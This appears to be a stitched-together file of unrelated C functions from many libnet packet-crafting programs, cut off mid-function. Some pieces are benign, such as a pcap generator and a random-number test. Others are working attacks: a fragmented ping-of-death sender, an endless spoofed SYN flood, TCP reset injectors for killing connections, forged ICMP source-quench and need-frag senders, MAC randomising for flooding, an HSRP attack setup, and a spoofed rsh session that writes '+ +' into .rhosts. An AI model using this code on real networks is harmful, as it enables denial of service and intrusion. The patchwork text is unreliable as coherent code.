libnet_ptag_t build_pkt (libnet_t * l, u_long * seq, struct libnet_in6_addr src, struct libnet_in6_addr victim) { libnet_ptag_t ip_tag, tcp_tag; ip_tag = tcp_tag = LIBNET_PTAG_INITIALIZER; libnet_seed_prand (l); *seq = (u_long) libnet_get_prand (LIBNET_PRu32); tcp_tag = libnet_build_tcp (0, 0, *seq, libnet_get_prand (LIBNET_PRu32), TH_SYN, libnet_get_prand (LIBNET_PRu16), 0, 0, LIBNET_TCP_H, NULL, 0, l, 0); ip_tag = libnet_build_ipv6 (0, 0, LIBNET_TCP_H, IPPROTO_TCP, 64, src, victim, NULL, 0, l, 0); return tcp_tag; }
void send_tcp_pkts (libnet_t * l, libnet_plist_t * plist, libnet_ptag_t tcp_tag, u_long seq) { int i; u_short bport, eport; while (libnet_plist_chain_next_pair (plist, &bport, &eport) && (bport <= eport) && (bport)) for (i = bport; i <= eport; i++) { tcp_tag = libnet_build_tcp (libnet_get_prand (LIBNET_PRu16), i, seq, libnet_get_prand (LIBNET_PRu32), TH_SYN, libnet_get_prand (LIBNET_PRu16), 0, 0, LIBNET_TCP_H, NULL, 0, l, tcp_tag); libnet_write (l); usleep (1); /* kernel buffers will prevent high rate packet injection * unless we sleep for a while (1usec is enough) * There are cleaner ways of doing this... see libdnet */ } }
void tcp_answer_ack(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) { struct libnet_ipv4_hdr *ip; struct libnet_tcp_hdr *tcp; u_int32_t seq, win, ack; int len; libnet_t *libnet; libnet = (libnet_t *)user; pkt += pcap_off; len = pcap->caplen - pcap_off; ip = (struct libnet_ipv4_hdr *)pkt; tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); seq = ntohl(tcp->th_ack); ack = ntohl(tcp->th_seq) + 1; win = ntohs(tcp->th_win); libnet_clear_packet(libnet); libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport), seq, ack, TH_ACK, win, 0, 0, LIBNET_TCP_H, NULL, 0, libnet, 0); libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, libnet, 0); if (libnet_write(libnet) < 0) warn("writing ACK failed"); }
int main() { int i; char errbuf[LIBNET_ERRBUF_SIZE]; /* It's a good idea to have the payload as an array of * * bytes. If yours isn't, make a pointer to it and cast * * it.*/ u_int8_t payload[3000]; l = libnet_init(LIBNET_RAW4, "eth0", errbuf); if (l == NULL) { fprintf(stderr, "libnet_init() failed (raw4, 1st call): %s\n", errbuf); exit(EXIT_FAILURE); } /* Generating random payload */ libnet_seed_prand(l); for (i = 0; i < sizeof(payload); i++) { payload[i] = libnet_get_prand(LIBNET_PR8); } /* Building and sending the fragments */ frag_and_send(payload, sizeof(payload)); libnet_destroy(l); return 0; }
static void send_icmp_frag_needed(libnet_t *l, struct libnet_ipv4_hdr *ip) { struct libnet_icmpv4_hdr *icmp; int len; len = (ip->ip_hl * 4) + 8; icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H); icmp->icmp_type = ICMP_UNREACH; icmp->icmp_code = ICMP_UNREACH_NEEDFRAG; icmp->hun.frag.pad = 0; icmp->hun.frag.mtu = htons(MIN_MTU); memcpy((u_char *)icmp + LIBNET_ICMPV4_MASK_H, (u_char *)ip, len); len += LIBNET_ICMPV4_MASK_H; libnet_build_ipv4(LIBNET_IPV4_H + len, 4, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, (u_int8_t *) icmp, len, l, 0); if (libnet_write(l) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: ", libnet_addr2name4(ip->ip_dst.s_addr, 0), libnet_addr2name4(ip->ip_src.s_addr, 0)); fprintf(stderr, "%s unreachable - need to frag (mtu %d)\n", libnet_addr2name4(ip->ip_src.s_addr, 0), MIN_MTU); }
static void send_tcp_window_advertisement(libnet_t *l, struct libnet_ipv4_hdr *ip, struct libnet_tcp_hdr *tcp) { int len; ip->ip_hl = 5; ip->ip_len = htons(LIBNET_IPV4_H + LIBNET_TCP_H); ip->ip_id = libnet_get_prand(LIBNET_PRu16); memcpy(buf, (u_char *)ip, LIBNET_IPV4_H); tcp->th_off = 5; tcp->th_win = htons(MIN_WIN); memcpy(buf + LIBNET_IPV4_H, (u_char *)tcp, LIBNET_TCP_H); libnet_do_checksum(l, buf, IPPROTO_TCP, LIBNET_TCP_H); len = LIBNET_IPV4_H + LIBNET_TCP_H; if (libnet_write_raw_ipv4(l, buf, len) != len) warn("write"); fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n", libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), ntohl(tcp->th_ack), 1); }
static void send_icmp_source_quench(libnet_t *l, struct libnet_ipv4_hdr *ip) { struct libnet_icmpv4_hdr *icmp; int len; len = (ip->ip_hl * 4) + 8; icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H); icmp->icmp_type = ICMP_SOURCEQUENCH; icmp->icmp_code = 0; memcpy((u_char *)icmp + LIBNET_ICMPV4_ECHO_H, (u_char *)ip, len); len += LIBNET_ICMPV4_ECHO_H; libnet_build_ipv4(LIBNET_IPV4_H + len, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, (u_int8_t *) icmp, len, l, 0); if (libnet_write(l) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: source quench\n", libnet_addr2name4(ip->ip_dst.s_addr, 0), libnet_addr2name4(ip->ip_src.s_addr, 0)); }
uint16_t buildICMP_h(libnet_t *l, uint32_t dip, uint8_t *PAYLOAD) { uint16_t seqn, id, bytes_w; libnet_seed_prand(l); id= (uint16_t)libnet_get_prand(LIBNET_PR16); seqn =1; icmp_t = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id, seqn, PAYLOAD, PAYLOAD_L, l, icmp_t); if(icmp_t == -1) { fprintf(stderr,"libnet_build_ethernet() failed: %s\n",errbuf); goto bad; } ip_t = libnet_autobuild_ipv4( LIBNET_IPV4_H+LIBNET_ICMPV4_ECHO_H+PAYLOAD_L, IPPROTO_ICMP, dip,l); if(ip_t == -1) { fprintf(stderr,"libnet_autobuild_ipv4() failed: %s\n",errbuf); goto bad; } bytes_w = libnet_write(l); if(bytes_w == -1) { fprintf(stderr,"libnet_write() failed: %s\n",errbuf); goto bad; } return 1; bad: return -1; }
int main (int argc, char **argv) { unsigned long fakesrc, target; unsigned char *buf; unsigned char *data; int sock, i, flags, offset, len; if (argc != 2 || !(target = libnet_name_resolve(argv[1], 1))) { fprintf(stderr, "Usage: %s <target>\n", argv[0]); exit(1); } if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) { perror("raw sock"); exit(1); } /* get random src addr. */ libnet_seed_prand(); fakesrc = libnet_get_prand(LIBNET_PRu32); buf = malloc(LIBNET_IP_H + LIBNET_ICMP_ECHO_H); data = (unsigned char *)malloc(FRAG_LEN); for (i = 0 ; i < 65536 ; i += (LIBNET_ICMP_ECHO_H + FRAG_LEN)) { offset = i; flags = 0; if (offset < 65120) { flags = IP_MF; len = FRAG_LEN; } else len = 410; /* for total reconstructed len of 65538 */ /* make IP header. */ libnet_build_ip(LIBNET_ICMP_ECHO_H + len, 0, 666, flags | (offset >> 3), 64, IPPROTO_ICMP, fakesrc, target, NULL, 0, buf); /* make ICMP packet. */ libnet_build_icmp_echo(8, 0, 666, 666, data, len, buf + LIBNET_IP_H); /* calculate ICMP checksum. */ libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H + len); /* send it. */ libnet_write_ip(sock, buf, LIBNET_IP_H + LIBNET_ICMP_ECHO_H + len); /* tcpdump-style jonks. */ printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_host_lookup(fakesrc,0), argv[1], LIBNET_ICMP_ECHO_H + len, offset, flags ? "+" : ""); } free(buf); return (EXIT_SUCCESS); }
static void tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) { struct libnet_ipv4_hdr *ip; struct libnet_tcp_hdr *tcp; char ctext[64]; u_int32_t seq, win; int i, len; libnet_t *l; l = (libnet_t *)user; pkt += pcap_off; len = pcap->caplen - pcap_off; ip = (struct libnet_ipv4_hdr *)pkt; if (ip->ip_p != IPPROTO_TCP) return; tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST)) return; seq = ntohl(tcp->th_ack); win = ntohs(tcp->th_win); snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:", libnet_addr2name4(ip->ip_src.s_addr, LIBNET_DONT_RESOLVE), ntohs(tcp->th_sport), libnet_addr2name4(ip->ip_dst.s_addr, LIBNET_DONT_RESOLVE), ntohs(tcp->th_dport)); for (i = 0; i < Opt_severity; i++) { seq += (i * win); libnet_clear_packet(l); libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport), seq, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, l, 0); libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, l, 0); if (libnet_write(l) < 0) warn("write"); fprintf(stderr, "%s R %lu:%lu(0) win 0\n", ctext, (unsigned long) seq, (unsigned long) seq); } ++kill_counter; if (Opt_max_kill && kill_counter >= Opt_max_kill) { pcap_breakloop(pd); } }
static void ip_validatedata(void) { struct sockaddr_in sin; /* validation tests */ if (iphdr.ip_src.s_addr == 0) iphdr.ip_src.s_addr = (u_int32_t)libnet_get_prand(PRu32); if (iphdr.ip_dst.s_addr == 0) iphdr.ip_dst.s_addr = (u_int32_t)libnet_get_prand(PRu32); /* if the user has supplied a source hardware addess but not a device * try to select a device automatically */ if (memcmp(etherhdr.ether_shost, zero, 6) && !got_link && !device) { if (libnet_select_device(&sin, &device, (char *)&errbuf) < 0) { printf("ERROR: Device not specified and unable to automatically " "select a device.\n"); ip_exit(1); } else { #ifdef DEBUG printf("DEBUG: automatically selected device: " " %s\n", device); #endif got_link = 1; } } /* if a device was specified and the user has not specified a source * hardware address, try to determine the source address automatically */ if (got_link) { if ((nemesis_check_link(ðerhdr, device)) < 0) { fprintf(stderr, "ERROR: cannot retrieve hardware address of " "%s.\n", device); ip_exit(1); } } return; }
int8_t hsrp_init_attribs( struct term_node *node ) { struct hsrp_data *hsrp_data; u_int32_t lbl32; hsrp_data = node->protocol[PROTO_HSRP].tmp_data; /* HSRP stuff */ hsrp_data->version = HSRP_DFL_VERSION; hsrp_data->opcode = HSRP_DFL_TYPE; hsrp_data->state = HSRP_DFL_STATE; hsrp_data->hello_time = HSRP_DFL_HELLO_TIME; hsrp_data->hold_time = HSRP_DFL_HOLD_TIME; hsrp_data->priority = HSRP_DFL_PRIORITY; hsrp_data->group = HSRP_DFL_GROUP; hsrp_data->reserved = HSRP_DFL_RESERVED; memset( (void *)hsrp_data->authdata, 0, HSRP_AUTHDATA_LENGTH ); if ( strlen( HSRP_DFL_AUTHDATA ) < HSRP_AUTHDATA_LENGTH ) memcpy( (void *)hsrp_data->authdata, (void *)HSRP_DFL_AUTHDATA, strlen( HSRP_DFL_AUTHDATA ) ); else memcpy( (void *)hsrp_data->authdata, (void *)HSRP_DFL_AUTHDATA, HSRP_AUTHDATA_LENGTH ); lbl32 = libnet_get_prand(LIBNET_PRu32); memcpy((void *)&hsrp_data->virtual_ip, (void *) &lbl32, 4); hsrp_data->sport = HSRP_DFL_PORT; hsrp_data->dport = HSRP_DFL_PORT; lbl32 = libnet_get_prand(LIBNET_PRu32); memcpy((void *)&hsrp_data->sip, (void *)&lbl32, sizeof(u_int32_t)); hsrp_data->dip = ntohl(inet_addr("224.0.0.2")); attack_gen_mac(hsrp_data->mac_source); hsrp_data->mac_source[0] &= 0x0E; parser_vrfy_mac("01:00:5e:00:00:02",hsrp_data->mac_dest); return 0; }
void send_rsh_command(u_int32_t ack) { u_int32_t seq = libnet_get_prand(LIBNET_PRu16);; char payload[] = "0\0tsutomu\0tsutomu\0echo + + >> .rhosts"; /* send syn */ send_packet("172.16.1.1", 1022, 514, seq, 0, TH_SYN, NULL, 0); /* send ack with rsh command */ send_packet("172.16.1.1", 1022, 514, seq + 1, ack, TH_ACK | TH_PUSH,\ (u_int8_t*) payload, (u_int32_t) sizeof(payload)); }
void send_syns(libnet_t *libnet, u_int32_t source_addr, u_int32_t target_addr, unsigned int port, useconds_t delay) { libnet_seed_prand(libnet); for(;;) { libnet_clear_packet(libnet); libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), port, libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), TH_SYN, 8192, 0, 0, LIBNET_TCP_H, NULL, 0, libnet, 0); libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, source_addr, target_addr, NULL, 0, libnet, 0); if (libnet_write(libnet) < 0) warn("writing SYN failed"); usleep(delay); } }
int init(void) { /* Ethernet header */ etherhdr.ether_type = ETHERTYPE_IP; /* Ethernet type IP */ memset(etherhdr.ether_shost, 0, 6); /* Ethernet source address */ memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */ /* IP header */ memset(&iphdr.ip_src.s_addr, 0, 4); /* IP source address 0.0.0.0 * (pretend to be proxy to * avoid being elected as master) */ inet_aton(MCAST_ALL_HOSTS, &iphdr.ip_dst); /* IP destination address */ iphdr.ip_tos = 0; /* IP type of services */ iphdr.ip_id = (u_int16_t)libnet_get_prand(PRu16); /* IP ID */ iphdr.ip_p = IPPROTO_IGMP; /* IP protocol IGMP */ iphdr.ip_off = 0; /* IP fragmentation offset */ iphdr.ip_ttl = 1; /* IP TTL - set to 1 purposely */ /* IGMP header */ igmphdr.igmp_type = IGMP_MEMBERSHIP_QUERY; /* IGMP type */ igmphdr.igmp_code = 0; /* IGMP code */ inet_aton(MCAST_MDNS, &igmphdr.igmp_group); /* IGMP group address */ /* Create packet */ linkint = libnet_open_link_interface(LINK_INTERFACE, errbuf); if (linkint == NULL) { return -1; } igmp_packetlen = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_IGMP_H; if (libnet_init_packet(igmp_packetlen, &pkt) == -1) { return -1; } libnet_build_ethernet(etherhdr.ether_dhost, etherhdr.ether_shost, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(LIBNET_IGMP_H, iphdr.ip_tos, iphdr.ip_id, iphdr.ip_off, iphdr.ip_ttl, iphdr.ip_p, iphdr.ip_src.s_addr, iphdr.ip_dst.s_addr, NULL, 0, pkt + LIBNET_ETH_H); libnet_build_igmp(igmphdr.igmp_type, igmphdr.igmp_code, igmphdr.igmp_group.s_addr, NULL, 0, pkt + LIBNET_ETH_H + LIBNET_IP_H); libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H); libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IGMP, LIBNET_IGMP_H); }
// Initialise fake TCP session state int init_fake_session_state( FakeSessionState* fakeSess ) { // Init libnet context fakeSess->ln = libnet_init( LIBNET_LINK, config.cap[capindex]->dst_interface, errbuf.libnet ); if( fakeSess->ln == NULL ) { if (config.daemon) syslog(LOG_ERR, "error opening libnet context: %s", errbuf.libnet); else fprintf(stderr, "Error opening libnet context: %s.\n", errbuf.libnet); return( -1 ); } if( libnet_seed_prand( fakeSess->ln ) == -1 ) { if (config.daemon) syslog(LOG_ERR, "error seeding libnet prand: %s", errbuf.libnet); else fprintf(stderr, "Error seeding libnet prand: %s.\n", errbuf.libnet); libnet_destroy( fakeSess->ln ); return( -1 ); } // Initialise other member variables fakeSess->handshakeSent = 0; fakeSess->clientSeq = libnet_get_prand (LIBNET_PRu16); fakeSess->serverSeq = libnet_get_prand (LIBNET_PRu16); return( 1 ); }
static void ip_initdata(void) { /* defaults */ etherhdr.ether_type = ETHERTYPE_IP; /* Ethernet type IP */ memset(etherhdr.ether_shost, 0, 6); /* Ethernet source address */ memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */ memset(&iphdr.ip_src.s_addr, 0, 4); /* IP source address */ memset(&iphdr.ip_dst.s_addr, 0, 4); /* IP destination address */ iphdr.ip_tos = 0; /* IP type of service */ iphdr.ip_id = (u_int16_t)libnet_get_prand(PRu16); /* IP ID */ iphdr.ip_off = 0; /* IP fragmentation offset */ iphdr.ip_ttl = 255; /* IP TTL */ iphdr.ip_p = 0; /* IP protocol */ pd.file_mem = NULL; pd.file_s = 0; ipod.file_mem = NULL; ipod.file_s = 0; return; }
//=============================== //I tried to do this same concept using LIBNET_RAW4 instead of LIBNET_LINK so //I wouldn't have to worry about the ethernet header. But something weird happens when I //try to do this. If there is already an established connection.. e.g. 70.116.23.2:3779 to //192.168.0.2:6112, if we send the packet using raw4, in tcpdump we get //70.116.23.2:1024 --> 192.168.0.2:6112. I am really not sure why it won't send the correct //source port if that connection is already established, but using LIBNET_LINK seems to not //have this problem. I believe it is a kernel related issue. void TcpKill::Execute(const wxString &sIp, u_int nPort) { char szErrBuf[LIBNET_ERRBUF_SIZE]; libnet_ptag_t ip; libnet_ptag_t tcp; wxString sSniffDevice = CONFIG(wxString, "Network/SniffDevice"); wxString sGameHost = CONFIG(wxString, "Network/GameHost"); int nGamePort = CONFIG(int, "Network/GamePort"); shared_ptr<NodeInfo> pNodeInfo = Info::Get()->GetNodeInfo(sIp, nPort); if (!pNodeInfo) { //Interface::Get()->Output(wxString::Format("Can't find %s:%d in net info map.", m_sIp.c_str(), m_nPort), OUTPUT_ERROR); return; } NetInfo &netInfo = Info::Get()->GetNetInfo(); //This is pretty inefficient since I constantly init libnet and destroy it. It would be better //if we could init once and just keep changing the sequence number and destination ip. for (u_int x = 0; x < m_nSeverity; x++) { u_int32_t seq_out = pNodeInfo->last_sentack; libnet_t *pLibnet = libnet_init(LIBNET_LINK, const_cast<char *>(sSniffDevice.c_str()), szErrBuf); libnet_seed_prand(pLibnet); tcp = libnet_build_tcp(nPort, nGamePort, seq_out, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, pLibnet, 0); u_long src_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sIp.c_str()), LIBNET_DONT_RESOLVE); u_long dst_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sGameHost.c_str()), LIBNET_DONT_RESOLVE); ip = libnet_build_ipv4(sizeof(net_ip) + sizeof(net_tcp), 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, src_ip, dst_ip, NULL, 0, pLibnet, 0); libnet_autobuild_ethernet(netInfo.gamehost_ether, ETHERTYPE_IP, pLibnet); libnet_write(pLibnet); libnet_destroy(pLibnet); } }
int main(int argc, char **argv) { char *srv_addr; char *srv_port; char *cli_addr; char *cli_port; libnet_t *attack; u_int32_t srv_ip_addr, cli_ip_addr, seq_num; libnet_ptag_t ip_tag, tcp_tag; char *error_msg = "Error"; if(argc >= 2) { cli_addr = argv[1]; } else { cli_addr = "127.0.0.1"; } if(argc >= 3) { cli_port = argv[2]; } else { cli_port = "10001"; } if (argc >= 4) { srv_addr = argv[3]; } else { srv_addr = "127.0.0.1"; } if (argc >= 5) { srv_port = argv[4]; } else { srv_port = "9999"; } seq_num = 1200000000; ip_tag=0; tcp_tag=0; attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed srv_ip_addr = libnet_name2addr4(attack, srv_addr, LIBNET_DONT_RESOLVE); cli_ip_addr = libnet_name2addr4(attack, cli_addr, LIBNET_DONT_RESOLVE); //atoi(cli_port); //atoi(srv_port); libnet_build_tcp( atoi(cli_port), /* src port */ //problem atoi(srv_port), /* destination port */ //problem seq_num, /* sequence number */ 0, /* acknowledgement */ TH_RST, /* control flags */ 7, /* window */ 0, /* checksum - 0 = autofill */ 0, /* urgent */ LIBNET_TCP_H, /* header length */ NULL, /* payload */ 0, /* payload length */ attack, /* libnet context */ tcp_tag); /* protocol tag */ libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, /* length */ 0, /* TOS */ libnet_get_prand (LIBNET_PRu16), /* IP ID */ 0, /* frag offset */ 127, /* TTL */ IPPROTO_TCP, /* upper layer protocol */ 0, /* checksum, 0=autofill */ cli_ip_addr, /* src IP */ srv_ip_addr, /* dest IP */ NULL, /* payload */ 0, /* payload len */ attack, /* libnet context */ ip_tag); /* protocol tag */ printf("starting reset attack on TCP connection: client %s:%s, server %s:%s\n", cli_addr, cli_port, srv_addr, srv_port); printf("Libnet value: %d: %u\nServer Port: %s\nClient Port: %s", libnet_write(attack), seq_num, srv_port, cli_port); //libnet_write(attack) libnet_destroy(attack); for(seq_num = (1200000000-16384); seq_num>0; seq_num=(seq_num-16384)) { attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed libnet_build_tcp(atoi(cli_port), atoi(srv_port), seq_num, 0, TH_RST, 7,0, 0, LIBNET_TCP_H, NULL, 0, attack, tcp_tag); libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, 0, libnet_get_prand (LIBNET_PRu16), 0, 127, IPPROTO_TCP, 0, cli_ip_addr, srv_ip_addr, NULL, 0, attack, ip_tag); //libnet_write(attack); //printf("Libnet value: %d: %d\n", libnet_write(attack), seq_num); libnet_write(attack); libnet_destroy(attack); } printf("Test3"); //attack successful //libnet_destroy(attack); return 0; }
int main(int argc, char **argv) { int i, j; printf("Psuedorandom number generation\n"); printf("For each trial, 1000 numbers will be generated\n"); libnet_seed_prand(); printf("\n\nPress return for trial 1 (0 - 1)\n\n"); getc(stdin); for (i = 1000; i; i--) { printf("%ld ", libnet_get_prand(LIBNET_PR2)); } printf("\n\nPress return for trial 2 (0 - 255)\n\n"); getc(stdin); for (i = 1000; i; i--) { printf("%3ld ", libnet_get_prand(LIBNET_PR8)); } printf("\n\nPress return for trial 3 (0 - 32767)\n\n"); getc(stdin); for (j = 13, i = 1000; i; i--, j--) { if (!j) { printf("\n"); j = 13; } printf("%5ld ", libnet_get_prand(LIBNET_PR16)); } printf("\n\nPress return for trial 4 (0 - 65535)\n\n"); getc(stdin); for (j = 13, i = 1000; i; i--, j--) { if (!j) { printf("\n"); j = 13; } printf("%5ld ", libnet_get_prand(LIBNET_PRu16)); } printf("\n\nPress return for trial 5 (0 - 2147483647)\n\n"); getc(stdin); for (j = 7, i = 1000; i; i--, j--) { if (!j) { printf("\n"); j = 7; } printf("%10ld ", libnet_get_prand(LIBNET_PR32)); } printf("\n\nPress return for trial 6 (0 - 4294967295)\n\n"); getc(stdin); for (j = 7, i = 1000; i; i--, j--) { if (!j) { printf("\n"); j = 7; } printf("%10ld ", libnet_get_prand(LIBNET_PRu32)); } printf("\nCompleted\n"); return (EXIT_SUCCESS); }
void PcapGen::send_tcp_packet( const TcpState& from, const TcpState& to, uint8_t control, const uint8_t* data, size_t size) { if (!lnet_) return; libnet_build_tcp(from.port(), // sp to.port(), // dp from.seq(), // seq control & TH_ACK ? from.ack() : 0, // ack control, // control from.win(), // win 0, // sum 0, // urg LIBNET_TCP_H + size, // len data, (uint32_t)size, lnet_.get(), 0); libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H + size, // ip_len 0, // tos libnet_get_prand(LIBNET_PRu32), // id 0, // frag 64, // ttl IPPROTO_TCP, 0, // sum from.ip_addr(), // src to.ip_addr(), // dst 0, 0, lnet_.get(), 0); libnet_build_ethernet(from.mac_addr(), to.mac_addr(), ETHERTYPE_IP, 0, 0, lnet_.get(), 0); // see libnet_write() source code; calling internal function here uint32_t packet_size; uint8_t *packet_data; auto c = libnet_pblock_coalesce(lnet_.get(), &packet_data, &packet_size); if (c == -1) { libnet_clear_packet(lnet_.get()); return; } pcap_pkthdr packet_hdr; packet_hdr.ts.tv_sec = 0; packet_hdr.ts.tv_usec = 0; packet_hdr.len = packet_size; packet_hdr.caplen = packet_size; pcap_dump(reinterpret_cast<u_char *>(pcap_dump_.get()), &packet_hdr, packet_data); // see libnet_write() source code if (lnet_->aligner > 0) { packet_data -= lnet_->aligner; } free(packet_data); libnet_clear_packet(lnet_.get()); }
int main(int argc, char *argv[]) { int c, i; u_char *cp; libnet_t *l; libnet_ptag_t ip; libnet_ptag_t tcp; struct libnet_stats ls; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char opt[20]; char errbuf[LIBNET_ERRBUF_SIZE]; FILE *dmf; char *dms; int pay_s; char *dmfn = "kw.txt"; char *paybuf, *pp; u_char bt; char linebuf[MAXTEXT]; /* Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } libnet_seed_prand(l); tcp = 0; ip = 0; dst_ip = libnet_get_prand(LIBNET_PRu32); src_ip = libnet_get_prand(LIBNET_PRu32); src_prt = libnet_get_prand(LIBNET_PRu16); dst_prt = 80; /* http */ while ((c = getopt(argc, argv, "d:s:p:f:")) != EOF) { switch (c) { case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'p': dst_prt = (u_short)atoi(optarg); printf("Dest port: %d\n", dst_prt); break; case 'f': dmfn = optarg; printf("File name: %s\n", dmfn); break; default: exit(EXIT_FAILURE); } } /* Read the keywords, dest IPs, src IPs , and construct http payload */ if( (dmf = fopen(dmfn, "r")) == NULL) { fprintf(stderr, "Error opening the content file %s \n", dmfn); exit(1); } /* end if */ printf("Reading content ...\n"); i = 0; while ((i < MAXTEXT) && ( (c=fgetc(dmf)) != EOF ) ) { linebuf[i++] = c; } fclose(dmf); linebuf[i] = '\0'; paybuf = linebuf; dms = (char *)malloc(strlen(paybuf)+1); /* alloc mem */ strcpy(dms, paybuf); pay_s = strlen(dms); /* ===== for message body debugging */ printf("Content read:\n"); for (i=0; i < pay_s; i++) { bt = *(dms + i); printf(" %02X", bt); } printf("\n"); /*=== */ /* Building TCP */ tcp = libnet_build_tcp( src_prt, /* source port */ dst_prt, /* destination port */ libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), 0x18, /* (PSH, ACK) */ libnet_get_prand(LIBNET_PRu16), /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + pay_s, /* packet length */ dms, /* payload */ pay_s, /* payload size */ l, /* libnet handle */ tcp); /* libnet id */ if (tcp == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } /* Building IP */ ip = libnet_build_ipv4( LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */ 0x00, /* TOS */ 0, /* IP ID */ 0x4000, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, dst_ip, NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ ip); /* libnet id */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { /* printf("Wrote %d byte TCP packet; check the wire.\n", c); */ } /* usleep(20); slow down to conserve bandwidth */ libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %ld\n" "Packet errors: %ld\n" "Bytes written: %ld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
/* * macof.c * gen_mac from Dug Song's macof-1.1 C port */ void attack_gen_mac(u_int8_t *mac) { *((in_addr_t *)mac) = libnet_get_prand(LIBNET_PRu32); *((u_int16_t *)(mac + 4)) = libnet_get_prand(LIBNET_PRu16); }
void drench_send_tcp(pkt_t *dp, u_int8_t offset, u_char *pkt) { struct ether_header *eh = NULL; struct ip *ih = NULL; struct tcphdr *th = NULL; char *state = NULL; in_port_t sport = 0; size_t paylen = 0; u_int32_t isn = 0; if (dp->payload != NULL) paylen = strlen(dp->payload); state = TCP_PHASE(dp->flags, "S", "A"); if (pkt != NULL) { eh = (struct ether_header *)pkt; ih = (struct ip *)(pkt + sizeof(struct ether_header)); th = (struct tcphdr *)(pkt + sizeof(struct ether_header) + sizeof(struct ip)); isn = th->th_ack; sport = th->th_dport; } else { sport = libnet_get_prand(LIBNET_PRu16); } /* Sanity check: check the ack number of the packet to * make sure we sent it. We can do this by performing * a calculation on the sequence number we * send, based on a "secret" random number */ if (check_isn(dp, sport, &isn) < 0) { (void)fprintf(stdout, "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u INVALID ISN in ACK%s [isn = %u]\n", state, TCP_PHASE( dp->flags, dp->saddr, libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE) ), sport, TCP_PHASE( dp->flags, dp->daddr, libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE) ), dp->dport, 